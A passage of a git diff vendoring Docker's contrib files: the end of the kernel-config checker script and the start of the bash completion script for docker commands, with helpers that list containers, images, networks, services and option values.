[ "$kernelMajor" -lt 3 ] || [ "$kernelMajor" -eq 3 -a "$kernelMinor" -le 13 ]; then + netprio=NETPRIO_CGROUP +else + netprio=CGROUP_NET_PRIO +fi + +flags=( + BLK_CGROUP BLK_DEV_THROTTLING IOSCHED_CFQ CFQ_GROUP_IOSCHED + CGROUP_PERF + CGROUP_HUGETLB + NET_CLS_CGROUP $netprio + CFS_BANDWIDTH FAIR_GROUP_SCHED RT_GROUP_SCHED + IP_VS + IP_VS_NFCT + IP_VS_RR +) +check_flags "${flags[@]}" + +if ! is_set EXT4_USE_FOR_EXT2; then + check_flags EXT3_FS EXT3_FS_XATTR EXT3_FS_POSIX_ACL EXT3_FS_SECURITY + if ! is_set EXT3_FS || ! is_set EXT3_FS_XATTR || ! is_set EXT3_FS_POSIX_ACL || ! is_set EXT3_FS_SECURITY; then + echo " $(wrap_color '(enable these ext3 configs if you are using ext3 as backing filesystem)' bold black)" + fi +fi + +check_flags EXT4_FS EXT4_FS_POSIX_ACL EXT4_FS_SECURITY +if ! is_set EXT4_FS || ! is_set EXT4_FS_POSIX_ACL || ! is_set EXT4_FS_SECURITY; then + if is_set EXT4_USE_FOR_EXT2; then + echo " $(wrap_color 'enable these ext4 configs if you are using ext3 or ext4 as backing filesystem' bold black)" + else + echo " $(wrap_color 'enable these ext4 configs if you are using ext4 as backing filesystem' bold black)" + fi +fi + +echo '- Network Drivers:' +echo ' - "'$(wrap_color 'overlay' blue)'":' +check_flags VXLAN | sed 's/^/ /' +echo ' Optional (for encrypted networks):' +check_flags CRYPTO CRYPTO_AEAD CRYPTO_GCM CRYPTO_SEQIV CRYPTO_GHASH \ + XFRM XFRM_USER XFRM_ALGO INET_ESP INET_XFRM_MODE_TRANSPORT | sed 's/^/ /' +echo ' - "'$(wrap_color 'ipvlan' blue)'":' +check_flags IPVLAN | sed 's/^/ /' +echo ' - "'$(wrap_color 'macvlan' blue)'":' +check_flags MACVLAN DUMMY | sed 's/^/ /' + +# only fail if no storage drivers available +CODE=${EXITCODE} +EXITCODE=0 +STORAGE=1 + +echo '- Storage Drivers:' +echo ' - "'$(wrap_color 'aufs' blue)'":' +check_flags AUFS_FS | sed 's/^/ /' +if ! is_set AUFS_FS && grep -q aufs /proc/filesystems; then + echo " $(wrap_color '(note that some kernels include AUFS patches but not the AUFS_FS flag)' bold black)" +fi +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'btrfs' blue)'":' +check_flags BTRFS_FS | sed 's/^/ /' +check_flags BTRFS_FS_POSIX_ACL | sed 's/^/ /' +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'devicemapper' blue)'":' +check_flags BLK_DEV_DM DM_THIN_PROVISIONING | sed 's/^/ /' +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'overlay' blue)'":' +check_flags OVERLAY_FS | sed 's/^/ /' +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +echo ' - "'$(wrap_color 'zfs' blue)'":' +echo -n " - "; check_device /dev/zfs +echo -n " - "; check_command zfs +echo -n " - "; check_command zpool +[ "$EXITCODE" = 0 ] && STORAGE=0 +EXITCODE=0 + +EXITCODE=$CODE +[ "$STORAGE" = 1 ] && EXITCODE=1 + +echo + +check_limit_over() +{ + if [ $(cat "$1") -le "$2" ]; then + wrap_bad "- $1" "$(cat $1)" + wrap_color " This should be set to at least $2, for example set: sysctl -w kernel/keys/root_maxkeys=1000000" bold black + EXITCODE=1 + else + wrap_good "- $1" "$(cat $1)" + fi +} + +echo 'Limits:' +check_limit_over /proc/sys/kernel/keys/root_maxkeys 10000 +echo + +exit $EXITCODE diff --git a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS new file mode 100644 index 0000000000..03ee2dde3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS @@ -0,0 +1,2 @@ +Tianon Gravi (@tianon) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/bash/docker b/vendor/github.com/docker/docker/contrib/completion/bash/docker new file mode 100644 index 0000000000..7ea5d9a9f4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/bash/docker @@ -0,0 +1,4282 @@ +#!/bin/bash +# +# bash completion file for core docker commands +# +# This script provides completion of: +# - commands and their options +# - container ids and names +# - image repos and tags +# - filepaths +# +# To enable the completions either: +# - place this file in /etc/bash_completion.d +# or +# - copy this file to e.g. ~/.docker-completion.sh and add the line +# below to your .bashrc after bash completion features are loaded +# . ~/.docker-completion.sh +# +# Configuration: +# +# For several commands, the amount of completions can be configured by +# setting environment variables. +# +# DOCKER_COMPLETION_SHOW_CONTAINER_IDS +# DOCKER_COMPLETION_SHOW_NETWORK_IDS +# DOCKER_COMPLETION_SHOW_NODE_IDS +# DOCKER_COMPLETION_SHOW_PLUGIN_IDS +# DOCKER_COMPLETION_SHOW_SECRET_IDS +# DOCKER_COMPLETION_SHOW_SERVICE_IDS +# "no" - Show names only (default) +# "yes" - Show names and ids +# +# You can tailor completion for the "events", "history", "inspect", "run", +# "rmi" and "save" commands by settings the following environment +# variables: +# +# DOCKER_COMPLETION_SHOW_IMAGE_IDS +# "none" - Show names only (default) +# "non-intermediate" - Show names and ids, but omit intermediate image IDs +# "all" - Show names and ids, including intermediate image IDs +# +# DOCKER_COMPLETION_SHOW_TAGS +# "yes" - include tags in completion options (default) +# "no" - don't include tags in completion options + +# +# Note: +# Currently, the completions will not work if the docker daemon is not +# bound to the default communication port/socket +# If the docker daemon is using a unix socket for communication your user +# must have access to the socket for the completions to function correctly +# +# Note for developers: +# Please arrange options sorted alphabetically by long name with the short +# options immediately following their corresponding long form. +# This order should be applied to lists, alternatives and code blocks. + +__docker_previous_extglob_setting=$(shopt -p extglob) +shopt -s extglob + +__docker_q() { + docker ${host:+-H "$host"} ${config:+--config "$config"} 2>/dev/null "$@" +} + +# __docker_containers returns a list of containers. Additional options to +# `docker ps` may be specified in order to filter the list, e.g. +# `__docker_containers --filter status=running` +# By default, only names are returned. +# Set DOCKER_COMPLETION_SHOW_CONTAINER_IDS=yes to also complete IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +__docker_containers() { + local format + if [ "$1" = "--id" ] ; then + format='{{.ID}}' + shift + elif [ "$1" = "--name" ] ; then + format='{{.Names}}' + shift + elif [ "${DOCKER_COMPLETION_SHOW_CONTAINER_IDS}" = yes ] ; then + format='{{.ID}} {{.Names}}' + else + format='{{.Names}}' + fi + __docker_q ps --format "$format" "$@" +} + +# __docker_complete_containers applies completion of containers based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_containers`. +__docker_complete_containers() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_containers "$@")" -- "$current") ) +} + +__docker_complete_containers_all() { + __docker_complete_containers "$@" --all +} + +__docker_complete_containers_running() { + __docker_complete_containers "$@" --filter status=running +} + +__docker_complete_containers_stopped() { + __docker_complete_containers "$@" --filter status=exited +} + +__docker_complete_containers_unpauseable() { + __docker_complete_containers "$@" --filter status=paused +} + +__docker_complete_container_names() { + local containers=( $(__docker_q ps -aq --no-trunc) ) + local names=( $(__docker_q inspect --format '{{.Name}}' "${containers[@]}") ) + names=( "${names[@]#/}" ) # trim off the leading "/" from the container names + COMPREPLY=( $(compgen -W "${names[*]}" -- "$cur") ) +} + +__docker_complete_container_ids() { + local containers=( $(__docker_q ps -aq) ) + COMPREPLY=( $(compgen -W "${containers[*]}" -- "$cur") ) +} + +__docker_images() { + local images_args="" + + case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in + all) + images_args="--no-trunc -a" + ;; + non-intermediate) + images_args="--no-trunc" + ;; + esac + + local repo_print_command + if [ "${DOCKER_COMPLETION_SHOW_TAGS:-yes}" = "yes" ]; then + repo_print_command='print $1; print $1":"$2' + else + repo_print_command='print $1' + fi + + local awk_script + case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in + all|non-intermediate) + awk_script='NR>1 { print $3; if ($1 != "") { '"$repo_print_command"' } }' + ;; + none|*) + awk_script='NR>1 && $1 != "" { '"$repo_print_command"' }' + ;; + esac + + __docker_q images $images_args | awk "$awk_script" | grep -v '$' +} + +__docker_complete_images() { + COMPREPLY=( $(compgen -W "$(__docker_images)" -- "$cur") ) + __ltrim_colon_completions "$cur" +} + +__docker_complete_image_repos() { + local repos="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1 }')" + COMPREPLY=( $(compgen -W "$repos" -- "$cur") ) +} + +__docker_complete_image_repos_and_tags() { + local reposAndTags="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1; print $1":"$2 }')" + COMPREPLY=( $(compgen -W "$reposAndTags" -- "$cur") ) + __ltrim_colon_completions "$cur" +} + +# __docker_networks returns a list of all networks. Additional options to +# `docker network ls` may be specified in order to filter the list, e.g. +# `__docker_networks --filter type=custom` +# By default, only names are returned. +# Set DOCKER_COMPLETION_SHOW_NETWORK_IDS=yes to also complete IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +__docker_networks() { + local format + if [ "$1" = "--id" ] ; then + format='{{.ID}}' + shift + elif [ "$1" = "--name" ] ; then + format='{{.Name}}' + shift + elif [ "${DOCKER_COMPLETION_SHOW_NETWORK_IDS}" = yes ] ; then + format='{{.ID}} {{.Name}}' + else + format='{{.Name}}' + fi + __docker_q network ls --format "$format" "$@" +} + +# __docker_complete_networks applies completion of networks based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_networks`. +__docker_complete_networks() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_networks "$@")" -- "$current") ) +} + +__docker_complete_containers_in_network() { + local containers=$(__docker_q network inspect -f '{{range $i, $c := .Containers}}{{$i}} {{$c.Name}} {{end}}' "$1") + COMPREPLY=( $(compgen -W "$containers" -- "$cur") ) +} + +# __docker_volumes returns a list of all volumes. Additional options to +# `docker volume ls` may be specified in order to filter the list, e.g. +# `__docker_volumes --filter dangling=true` +# Because volumes do not have IDs, this function does not distinguish between +# IDs and names. +__docker_volumes() { + __docker_q volume ls -q "$@" +} + +# __docker_complete_volumes applies completion of volumes based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_volumes`. +__docker_complete_volumes() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_volumes "$@")" -- "$current") ) +} + +# __docker_plugins_bundled returns a list of all plugins of a given type. +# The type has to be specified with the mandatory option `--type`. +# Valid types are: Network, Volume, Authorization. +# Completions may be added or removed with `--add` and `--remove` +# This function only deals with plugins that come bundled with Docker. +# For plugins managed by `docker plugin`, see `__docker_plugins_installed`. +__docker_plugins_bundled() { + local type add=() remove=() + while true ; do + case "$1" in + --type) + type="$2" + shift 2 + ;; + --add) + add+=("$2") + shift 2 + ;; + --remove) + remove+=("$2") + shift 2 + ;; + *) + break + ;; + esac + done + + local plugins=($(__docker_q info | sed -n "/^Plugins/,/^[^ ]/s/ $type: //p")) + for del in "${remove[@]}" ; do + plugins=(${plugins[@]/$del/}) + done + echo "${plugins[@]} ${add[@]}" +} + +# __docker_complete_plugins_bundled applies completion of plugins based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# The plugin type has to be specified with the next option `--type`. +# This function only deals with plugins that come bundled with Docker. +# For completion of plugins managed by `docker plugin`, see +# `__docker_complete_plugins_installed`. +__docker_complete_plugins_bundled() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_plugins_bundled "$@")" -- "$current") ) +} + +# __docker_plugins_installed returns a list of all plugins that were installed with +# the Docker plugin API. +# By default, only names are returned. +# Set DOCKER_COMPLETION_SHOW_PLUGIN_IDS=yes to also complete IDs. +# For built-in pugins, see `__docker_plugins_bundled`. +__docker_plugins_installed() { + local fields + if [ "$DOCKER_COMPLETION_SHOW_PLUGIN_IDS" = yes ] ; then + fields='$1,$2' + else + fields='$2' + fi + __docker_q plugin ls | awk "NR>1 {print $fields}" +} + +# __docker_complete_plugins_installed applies completion of plugins that were installed +# with the Docker plugin API, based on the current value of `$cur` or the value of +# the optional first option `--cur`, if given. +# For completion of built-in pugins, see `__docker_complete_plugins_bundled`. +__docker_complete_plugins_installed() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_plugins_installed "$@")" -- "$current") ) +} + +__docker_runtimes() { + __docker_q info | sed -n 's/^Runtimes: \(.*\)/\1/p' +} + +__docker_complete_runtimes() { + COMPREPLY=( $(compgen -W "$(__docker_runtimes)" -- "$cur") ) +} + +# __docker_secrets returns a list of all secrets. +# By default, only names of secrets are returned. +# Set DOCKER_COMPLETION_SHOW_SECRET_IDS=yes to also complete IDs of secrets. +__docker_secrets() { + local fields='$2' # default: name only + [ "${DOCKER_COMPLETION_SHOW_SECRET_IDS}" = yes ] && fields='$1,$2' # ID and name + + __docker_q secret ls | awk "NR>1 {print $fields}" +} + +# __docker_complete_secrets applies completion of secrets based on the current value +# of `$cur`. +__docker_complete_secrets() { + COMPREPLY=( $(compgen -W "$(__docker_secrets)" -- "$cur") ) +} + +# __docker_stacks returns a list of all stacks. +__docker_stacks() { + __docker_q stack ls | awk 'NR>1 {print $1}' +} + +# __docker_complete_stacks applies completion of stacks based on the current value +# of `$cur` or the value of the optional first option `--cur`, if given. +__docker_complete_stacks() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_stacks "$@")" -- "$current") ) +} + +# __docker_nodes returns a list of all nodes. Additional options to +# `docker node ls` may be specified in order to filter the list, e.g. +# `__docker_nodes --filter role=manager` +# By default, only node names are returned. +# Set DOCKER_COMPLETION_SHOW_NODE_IDS=yes to also complete node IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +# Completions may be added with `--add`, e.g. `--add self`. +__docker_nodes() { + local add=() + local fields='$2' # default: node name only + [ "${DOCKER_COMPLETION_SHOW_NODE_IDS}" = yes ] && fields='$1,$2' # ID and name + + while true ; do + case "$1" in + --id) + fields='$1' # IDs only + shift + ;; + --name) + fields='$2' # names only + shift + ;; + --add) + add+=("$2") + shift 2 + ;; + *) + break + ;; + esac + done + + echo $(__docker_q node ls "$@" | tr -d '*' | awk "NR>1 {print $fields}") "${add[@]}" +} + +# __docker_complete_nodes applies completion of nodes based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_nodes`. +__docker_complete_nodes() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_nodes "$@")" -- "$current") ) +} + +__docker_complete_nodes_plus_self() { + __docker_complete_nodes --add self "$@" +} + +# __docker_services returns a list of all services. Additional options to +# `docker service ls` may be specified in order to filter the list, e.g. +# `__docker_services --filter name=xxx` +# By default, only node names are returned. +# Set DOCKER_COMPLETION_SHOW_SERVICE_IDS=yes to also complete IDs. +# An optional first option `--id|--name` may be used to limit the +# output to the IDs or names of matching items. This setting takes +# precedence over the environment setting. +__docker_services() { + local fields='$2' # default: service name only + [ "${DOCKER_COMPLETION_SHOW_SERVICE_IDS}" = yes ] && fields='$1,$2' # ID & name + + if [ "$1" = "--id" ] ; then + fields='$1' # IDs only + shift + elif [ "$1" = "--name" ] ; then + fields='$2' # names only + shift + fi + __docker_q service ls "$@" | awk "NR>1 {print $fields}" +} + +# __docker_complete_services applies completion of services based on the current +# value of `$cur` or the value of the optional first option `--cur`, if given. +# Additional filters may be appended, see `__docker_services`. +__docker_complete_services() { + local current="$cur" + if [ "$1" = "--cur" ] ; then + current="$2" + shift 2 + fi + COMPREPLY=( $(compgen -W "$(__docker_services "$@")" -- "$current") ) +} + +# __docker_append_to_completions appends the word passed as an argument to every +# word in `$COMPREPLY`. +# Normally you do this with `compgen -S` while generating the completions. +# This function allows you to append a suffix later. It allows you to use +# the __docker_complete_XXX functions in cases where you need a suffix. +__docker_append_to_completions() { + COMPREPLY=( ${COMPREPLY[@]/%/"$1"} ) +} + +# __docker_is_experimental tests whether the currently configured Docker daemon +# runs in experimental mode. If so, the function exits with 0 (true). +# Otherwise, or if the result cannot be determined, the exit value is 1 (false). +__docker_is_experimental() { + [ "$(__docker_q version -f '{{.Server.Experimental}}')" = "true" ] +} + +# __docker_pos_first_nonflag finds the position of the first word that is neither +# option nor an option's argument. If there are options that require arguments, +# you should pass a glob describing those options, e.g. "--option1|-o|--option2" +# Use this function to restrict completions to exact positions after the argument list. +__docker_pos_first_nonflag() { + local argument_flags=$1 + + local counter=$((${subcommand_pos:-${command_pos}} + 1)) + while [ $counter -le $cword ]; do + if [ -n "$argument_flags" ] && eval "case '${words[$counter]}' in $argument_flags) true ;; *) false ;; esac"; then + (( counter++ )) + # eat "=" in case of --option=arg syntax + [ "${words[$counter]}" = "=" ] && (( counter++ )) + else + case "${words[$counter]}" in + -*) + ;; + *) + break + ;; + esac + fi + + # Bash splits words at "=", retaining "=" as a word, examples: + # "--debug=false" => 3 words, "--log-opt syslog-facility=daemon" => 4 words + while [ "${words[$counter + 1]}" = "=" ] ; do + counter=$(( counter + 2)) + done + + (( counter++ )) + done + + echo $counter +} + +# __docker_map_key_of_current_option returns `key` if we are currently completing the +# value of a map option (`key=value`) which matches the extglob given as an argument. +# This function is needed for key-specific completions. +__docker_map_key_of_current_option() { + local glob="$1" + + local key glob_pos + if [ "$cur" = "=" ] ; then # key= case + key="$prev" + glob_pos=$((cword - 2)) + elif [[ $cur == *=* ]] ; then # key=value case (OSX) + key=${cur%=*} + glob_pos=$((cword - 1)) + elif [ "$prev" = "=" ] ; then + key=${words[$cword - 2]} # key=value case + glob_pos=$((cword - 3)) + else + return + fi + + [ "${words[$glob_pos]}" = "=" ] && ((glob_pos--)) # --option=key=value syntax + + [[ ${words[$glob_pos]} == @($glob) ]] && echo "$key" +} + +# __docker_value_of_option returns the value of the first option matching `option_glob`. +# Valid values for `option_glob` are option names like `--log-level` and globs like +# `--log-level|-l` +# Only positions between the command and the current word are considered. +__docker_value_of_option() { + local option_extglob=$(__docker_to_extglob "$1") + + local counter=$((command_pos + 1)) + while [ $counter -lt $cword ]; do + case ${words[$counter]} in + $option_extglob ) + echo ${words[$counter + 1]} + break + ;; + esac + (( counter++ )) + done +} + +# __docker_to_alternatives transforms a multiline list of strings into a single line +# string with the words separated by `|`. +# This is used to prepare arguments to __docker_pos_first_nonflag(). +__docker_to_alternatives() { + local parts=( $1 ) + local IFS='|' + echo "${parts[*]}" +} + +# __docker_to_extglob transforms a multiline list of options into an extglob pattern +# suitable for use in case statements. +__docker_to_extglob() { + local extglob=$( __docker_to_alternatives "$1" ) + echo "@($extglob)" +} + +# __docker_subcommands processes subcommands +# Locates the first occurrence of any of the subcommands contained in the +# first argument. In case of a match, calls the corresponding completion +# function and returns 0. +# If no match is found, 1 is returned. The calling function can then +# continue processing its completion. +# +# TODO if the preceding command has options that accept arguments and an +# argument is equal ot one of the subcommands, this is falsely detected as +# a match. +__docker_subcommands() { + local subcommands="$1" + + local counter=$(($command_pos + 1)) + while [ $counter -lt $cword ]; do + case "${words[$counter]}" in + $(__docker_to_extglob "$subcommands") ) + subcommand_pos=$counter + local subcommand=${words[$counter]} + local completions_func=_docker_${command}_${subcommand} + declare -F $completions_func >/dev/null && $completions_func + return 0 + ;; + esac + (( counter++ )) + done + return 1 +} + +# __docker_nospace suppresses trailing whitespace +__docker_nospace() { + # compopt is not available in ancient bash versions + type compopt &>/dev/null && compopt -o nospace +} + +__docker_complete_resolved_hostname() { + command -v host >/dev/null 2>&1 || return + COMPREPLY=( $(host 2>/dev/null "${cur%:}" | awk '/has address/ {print $4}') ) +} + +__docker_local_interfaces() { + command -v ip >/dev/null 2>&1 || return + ip addr show scope global 2>/dev/null | sed -n 's| \+inet \([0-9.]\+\).* \([^ ]\+\)|\1 \2|p' +} + +__docker_complete_local_interfaces() { + local additional_interface + if [ "$1" = "--add" ] ; then + additional_interface="$2" + fi + + COMPREPLY=( $( compgen -W "$(__docker_local_interfaces) $additional_interface" -- "$cur" ) ) +} + +__docker_complete_capabilities() { + # The list of capabilities is defined in types.go, ALL was added manually. + COMPREPLY=( $( compgen -W " + ALL + AUDIT_CONTROL + AUDIT_WRITE + AUDIT_READ + BLOCK_SUSPEND + CHOWN + DAC_OVERRIDE + DAC_READ_SEARCH + FOWNER + FSETID + IPC_LOCK + IPC_OWNER + KILL + LEASE + LINUX_IMMUTABLE + MAC_ADMIN + MAC_OVERRIDE + MKNOD + NET_ADMIN + NET_BIND_SERVICE + NET_BROADCAST + NET_RAW + SETFCAP + SETGID + SETPCAP + SETUID + SYS_ADMIN + SYS_BOOT + SYS_CHROOT + SYSLOG + SYS_MODULE + SYS_NICE + SYS_PACCT + SYS_PTRACE + SYS_RAWIO + SYS_RESOURCE + SYS_TIME + SYS_TTY_CONFIG + WAKE_ALARM + " -- "$cur" ) ) +} + +__docker_complete_detach-keys() { + case "$prev" in + --detach-keys) + case "$cur" in + *,) + COMPREPLY=( $( compgen -W "${cur}ctrl-" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "ctrl-" -- "$cur" ) ) + ;; + esac + + __docker_nospace + return + ;; + esac + return 1 +} + +__docker_complete_isolation() { + COMPREPLY=( $( compgen -W "default hyperv process" -- "$cur" ) ) +} + +__docker_complete_log_drivers() { + COMPREPLY=( $( compgen -W " + awslogs + etwlogs + fluentd + gcplogs + gelf + journald + json-file + logentries + none + splunk + syslog + " -- "$cur" ) ) +} + +__docker_complete_log_options() { + # see docs/reference/logging/index.md + local awslogs_options="awslogs-region awslogs-group awslogs-stream" + local fluentd_options="env fluentd-address fluentd-async-connect fluentd-buffer-limit fluentd-retry-wait fluentd-max-retries labels tag" + local gcplogs_options="env gcp-log-cmd gcp-project labels" + local gelf_options="env gelf-address gelf-compression-level gelf-compression-type labels tag" + local journald_options="env labels tag" + local json_file_options="env labels max-file max-size" + local logentries_options="logentries-token" + local syslog_options="env labels syslog-address syslog-facility syslog-format syslog-tls-ca-cert syslog-tls-cert syslog-tls-key syslog-tls-skip-verify tag" + local splunk_options="env labels splunk-caname splunk-capath splunk-format splunk-gzip splunk-gzip-level splunk-index splunk-insecureskipverify splunk-source splunk-sourcetype splunk-token splunk-url splunk-verify-connection tag" + + local all_options="$fluentd_options $gcplogs_options $gelf_options $journald_options $logentries_options $json_file_options $syslog_options $splunk_options" + + case $(__docker_value_of_option --log-driver) in + '') + COMPREPLY=( $( compgen -W "$all_options" -S = -- "$cur" ) ) + ;; + awslogs) + COMPREPLY=( $( compgen -W "$awslogs_options" -S = -- "$cur" ) ) + ;; + fluentd) + COMPREPLY=( $( compgen -W "$fluentd_options" -S = -- "$cur" ) ) + ;; + gcplogs) + COMPREPLY=( $( compgen -W "$gcplogs_options" -S = -- "$cur" ) ) + ;; + gelf) + COMPREPLY=( $( compgen -W "$gelf_options" -S = -- "$cur" ) ) + ;; + journald) + COMPREPLY=( $( compgen -W "$journald_options" -S = -- "$cur" ) ) + ;; + json-file) + COMPREPLY=( $( compgen -W "$json_file_options" -S = -- "$cur" ) ) + ;; + logentries) + COMPREPLY=( $( compgen -W "$logentries_options" -S = -- "$cur" ) ) + ;; + syslog) + COMPREPLY=( $( compgen -W "$syslog_options" -S = -- "$cur" ) ) + ;; + splunk) + COMPREPLY=( $( compgen -W "$splunk_options" -S = -- "$cur" ) ) + ;; + *) + return + ;; + esac + + __docker_nospace +} + +__docker_complete_log_driver_options() { + local key=$(__docker_map_key_of_current_option '--log-opt') + case "$key" in + fluentd-async-connect) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + gelf-address) + COMPREPLY=( $( compgen -W "udp" -S "://" -- "${cur##*=}" ) ) + __docker_nospace + return + ;; + gelf-compression-level) + COMPREPLY=( $( compgen -W "1 2 3 4 5 6 7 8 9" -- "${cur##*=}" ) ) + return + ;; + gelf-compression-type) + COMPREPLY=( $( compgen -W "gzip none zlib" -- "${cur##*=}" ) ) + return + ;; + syslog-address) + COMPREPLY=( $( compgen -W "tcp:// tcp+tls:// udp:// unix://" -- "${cur##*=}" ) ) + __docker_nospace + __ltrim_colon_completions "${cur}" + return + ;; + syslog-facility) + COMPREPLY=( $( compgen -W " + auth + authpriv + cron + daemon + ftp + kern + local0 + local1 + local2 + local3 + local4 + local5 + local6 + local7 + lpr + mail + news + syslog + user + uucp + " -- "${cur##*=}" ) ) + return + ;; + syslog-format) + COMPREPLY=( $( compgen -W "rfc3164 rfc5424 rfc5424micro" -- "${cur##*=}" ) ) + return + ;; + syslog-tls-ca-cert|syslog-tls-cert|syslog-tls-key) + _filedir + return + ;; + syslog-tls-skip-verify) + COMPREPLY=( $( compgen -W "true" -- "${cur##*=}" ) ) + return + ;; + splunk-url) + COMPREPLY=( $( compgen -W "http:// https://" -- "${cur##*=}" ) ) + __docker_nospace + __ltrim_colon_completions "${cur}" + return + ;; + splunk-gzip|splunk-insecureskipverify|splunk-verify-connection) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + splunk-format) + COMPREPLY=( $( compgen -W "inline json raw" -- "${cur##*=}" ) ) + return + ;; + esac + return 1 +} + +__docker_complete_log_levels() { + COMPREPLY=( $( compgen -W "debug info warn error fatal" -- "$cur" ) ) +} + +__docker_complete_restart() { + case "$prev" in + --restart) + case "$cur" in + on-failure:*) + ;; + *) + COMPREPLY=( $( compgen -W "always no on-failure on-failure: unless-stopped" -- "$cur") ) + ;; + esac + return + ;; + esac + return 1 +} + +# __docker_complete_signals returns a subset of the available signals that is most likely +# relevant in the context of docker containers +__docker_complete_signals() { + local signals=( + SIGCONT + SIGHUP + SIGINT + SIGKILL + SIGQUIT + SIGSTOP + SIGTERM + SIGUSR1 + SIGUSR2 + ) + COMPREPLY=( $( compgen -W "${signals[*]} ${signals[*]#SIG}" -- "$( echo $cur | tr '[:lower:]' '[:upper:]')" ) ) +} + +__docker_complete_user_group() { + if [[ $cur == *:* ]] ; then + COMPREPLY=( $(compgen -g -- "${cur#*:}") ) + else + COMPREPLY=( $(compgen -u -S : -- "$cur") ) + __docker_nospace + fi +} + +_docker_docker() { + # global options that may appear after the docker command + local boolean_options=" + $global_boolean_options + --help + --version -v + " + + case "$prev" in + --config) + _filedir -d + return + ;; + --log-level|-l) + __docker_complete_log_levels + return + ;; + $(__docker_to_extglob "$global_options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $global_options_with_args" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag "$(__docker_to_extglob "$global_options_with_args")" ) + if [ $cword -eq $counter ]; then + __docker_is_experimental && commands+=(${experimental_commands[*]}) + COMPREPLY=( $( compgen -W "${commands[*]} help" -- "$cur" ) ) + fi + ;; + esac +} + +_docker_attach() { + _docker_container_attach +} + +_docker_build() { + _docker_image_build +} + + +_docker_checkpoint() { + local subcommands=" + create + ls + rm + " + local aliases=" + list + remove + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_checkpoint_create() { + case "$prev" in + --checkpoint-dir) + _filedir -d + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--checkpoint-dir --help --leave-running" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') + if [ $cword -eq $counter ]; then + __docker_complete_containers_running + fi + ;; + esac +} + +_docker_checkpoint_ls() { + case "$prev" in + --checkpoint-dir) + _filedir -d + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_checkpoint_rm() { + case "$prev" in + --checkpoint-dir) + _filedir -d + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + elif [ $cword -eq $(($counter + 1)) ]; then + COMPREPLY=( $( compgen -W "$(__docker_q checkpoint ls "$prev" | sed 1d)" -- "$cur" ) ) + fi + ;; + esac +} + + +_docker_container() { + local subcommands=" + attach + commit + cp + create + diff + exec + export + inspect + kill + logs + ls + pause + port + prune + rename + restart + rm + run + start + stats + stop + top + unpause + update + wait + " + local aliases=" + list + ps + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_container_attach() { + __docker_complete_detach-keys && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen 